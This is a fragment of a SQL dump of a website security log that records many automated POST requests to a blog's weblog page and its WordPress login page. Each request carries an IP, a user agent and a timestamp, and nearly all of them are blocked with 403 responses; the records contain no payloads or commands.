FBSMTWB\"}','mY7Bqk4W6ulcAtdMPoXwvZpI',0,1637216187.0758,470,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','GWyp1aVxQnAO0KHRiZzEvTNF',0,1637216188.3830,405,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Vkdx0OyGF3McgaN4hZ1IEeDA',0,1637216189.5084,392,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ryGwNsHmb1zAF8Wlgdk275Ut',0,1637216190.9153,396,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','9NmuXnKwZbovM2VHEepdP1ik',0,1637216192.7332,390,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','sldDUbLiqCT6ogxZJjazfmkM',0,1637216194.2542,426,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','hvXre06czRJjmMFTyUD4qEbA',0,1637216195.8251,412,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oiqRQCyzjXsBNcK5kOEVYxZd',0,1637216197.4342,777,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Z6pIn9iV7sBw4NQHmXfrUOTE',0,1637216199.1143,399,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','5diGZuh0LHc6tpMNvSAWy39n',0,1637216200.7281,399,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','XydkWErZzvqN3pTCwiKIAo57',0,1637216202.0239,401,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','xyfZARw87v6cBeCVgq5IL2SE',0,1637216203.1656,379,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WbYt8vpLDQARCHu306kdhzwU',0,1637216204.8005,429,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','n4ZsAmxqJoGITh6vMuSP5LW8',0,1637216206.3319,415,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','M9OETRLdZKSfg1APCocFqpy8',0,1637216207.4641,395,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','SuWINrsP9xlGCMTnLkj84gyR',0,1637216208.9064,119,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','d9rhfJI8PBsuoMjUSWQ3yGKN',0,1637216210.3599,391,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ai4cbSGzpyWJ2ZTt1oCfLYrN',0,1637216211.6275,377,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','vPpF9WbXV2UtmruRzSydQCnq',0,1637216213.4456,407,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','xXmqdl0rSO78oEaLQsFNKBGT',0,1637216214.6780,396,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Iq7afoQj6lzTbwhZuEL5g8iY',0,1637216216.4185,395,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','U0KbT284PmEIsiSqWwCnJxRg',0,1637216217.8015,443,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','4grcE07YkyGKLNeZbhsdnzJH',0,1637216219.2245,417,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QDCWP37Sz46eaqgbMEhUkw21',0,1637216220.4011,386,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','G6lDQLwFBHhTo48iYOetE9I2',0,1637216221.5744,402,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','zGpZnNK96SW5bVYTau84B7tv',0,1637216222.9393,442,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','BAX7d8G5PnvafIZbC1OTrtgp',0,1637216224.4018,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','YuojNHAx2svLnlSywtEQzW1I',0,1637216225.7012,381,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','WYga3IvV9NBsck1rUzwiTCl4',0,1637216227.3787,386,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','roBFdeA27PsK9tVU4Y6Q08NE',0,1637216228.4955,394,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','mxJpQbU6837gLC9KZsVlTOzD',0,1637216230.0960,400,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','lnvYDGZJ3tmENgWrUfFweac9',0,1637216231.4663,389,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','dErCIKGwvm7ocu1UjHSgk3bp',0,1637216233.0348,399,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','EziDS2KjkF90waAbIJXoQqMT',0,1637216234.7352,465,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','zPyTeaf6JvXBQmKNptYirZOo',0,1637216234.5547,1024,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','DyYrU3WSHKzmQuGhLFdR6nXg',0,1637216236.6631,386,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','g4GmSsqoJ8jHViNtf9OrIvaC',0,1637216237.9920,140,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','sewSyhPpAYNJk6xmqVlCz59t',0,1637216238.4443,466,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','HdVFC1IDOnxy3NtmLRjJbla2',0,1637216238.9683,158,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','FA6QyHINZvUgdSMWrkVD7tJE',0,1637216240.4566,123,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','TWA01YoBJiOLvh7mMr3x9nj8',0,1637216241.7969,412,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','f6EPphDb14avx5igYs8e2jUL',0,1637216241.8977,389,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','nBU8IHFwz7evA4qypJDlhNtC',0,1637216243.1758,382,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','qjlJhiAHQVSzFweBsd5NCkaP',0,1637216244.5720,418,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','GS2Q3DKIbgX7k0tB9Lj6cHmx',0,1637216245.5567,431,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','BlQ2wMI4h7yZ0sbEYTkjrNX3',0,1637216246.0009,442,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','zZpakG4UQt6OdJqHyAPX0lgx',0,1637216247.6361,151,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','P5jQc2HpJaKADO7iBeX3NCzx',0,1637216249.0680,394,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','Fy1ZkhSmK53o7ab0RnQdB9fY',0,1637216249.4604,189,'','POST',403,0,600,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','YdW5EN4meAT8F1fgLsbin7Pk',0,1637216250.7425,1332,'','POST',403,0,700,0,1,'',0),('41.225.212.115',702665843,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"python-requests\\/2.26.0\"}','0VJbZNmqfnXFld5pPOI7EkRh',0,1637216251.4489,984,'','GET',404,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','SfmAp7s1oTcHV5QdniuGK6a8',0,1637216253.2842,442,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','n5H1PWJK7I9DgrupRysSXvZt',0,1637216254.4546,437,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','DVGQTUtNfO8Z9npsw75lgWkz',0,1637216256.3242,458,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','DC5RTjLx04Akm2u3OJecEXQh',0,1637216257.9479,453,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','RpyWLUa89w0EK5viQFhJD32V',0,1637216259.4169,453,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','sqxIu56t3GEnTBvJczFyW14U',0,1637216260.7159,430,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','CRIKHQohx1PTMep0Zb4FWzSn',0,1637216261.8855,152,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','p01nZ6CTU3Bbemuqor2GcK5h',0,1637216262.9045,459,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','ay3ZPUQ18TvL7cFe0grOkRio',0,1637216264.0373,865,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','jCFKXW37vYu6hmq105ryodJA',0,1637216265.5632,436,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','tKuOMYjs7bDwVqPmLlHa4gRT',0,1637216266.6525,452,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','AZvwVu9g7sKmbLfFizQIJ4rU',0,1637216267.9016,427,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','0w9bcUJEq2jVIvkA7dH3C1Ze',0,1637216269.6142,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','AjY3bMdHLN5zWiXmqIvrVZ70',0,1637216270.9038,2485,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','AXWSkIyuOKlUef7opNw1Virv',0,1637216274.1740,446,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','r9upoaODmnxvsG6N8ZlVy7ET',0,1637216275.7191,439,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','b5OWamVkKcfX6tSuIiHsReTN',0,1637216277.0678,479,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QqxRU9kebwdOD1mWiMrJ6zPA',0,1637216278.5008,620,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','oJNnAgrc2DTK8eF5qzhMS9BL',0,1637216280.2331,481,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','1v2hAuae04CRzn3qliFPI7Xc',0,1637216281.4680,416,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','RBoFTNdML8EH6Y1pf4bZqzu2',0,1637216282.7671,394,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','dRHQ46ye25rkj9gptbK0hDmV',0,1637216284.3844,423,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','NL7f4v261A0r95boZjdwcmaT',0,1637216286.0426,410,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','vxkcdIgXor8SCQquZzmB6fHb',0,1637216287.2427,443,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','V1EGImpRPrJ0oi9bByXYwT8g',0,1637216288.8525,397,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','avEmeQhAfJS3yM4glsxtB6n1',0,1637216290.0401,404,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','Fqx7GmKorAZYuzTslHUctXv2',0,1637216291.4477,399,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','NzFlARESK1Uvq0tOGMe6kTh2',0,1637216293.0581,433,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','jTD4NnEFtypJmvQuXBIcqz5b',0,1637216294.6125,399,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','QoaksZJzbHcltCFV0fWjP6uX',0,1637216295.7091,379,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','7Znl8AuIXxY0iwUEqoamOLGj',0,1637216297.4012,474,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','M0JXGxPUSLQlqBHZra4Wg8tR',0,1637216298.6433,434,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','92b8MI4BulU3KTPwRamy0gpY',0,1637216300.2297,436,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 FBSMTWB\"}','kXsfpBdtCIogyEiHYcO1lanu',0,1637216301.6755,418,'','POST',403,0,700,0,1,'',0),('141.98.83.79',2372031311,'','https://www.ashbooks.co.uk/weblog/','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.16) Gecko\\/2009120208 Firefox\\/3.0.16 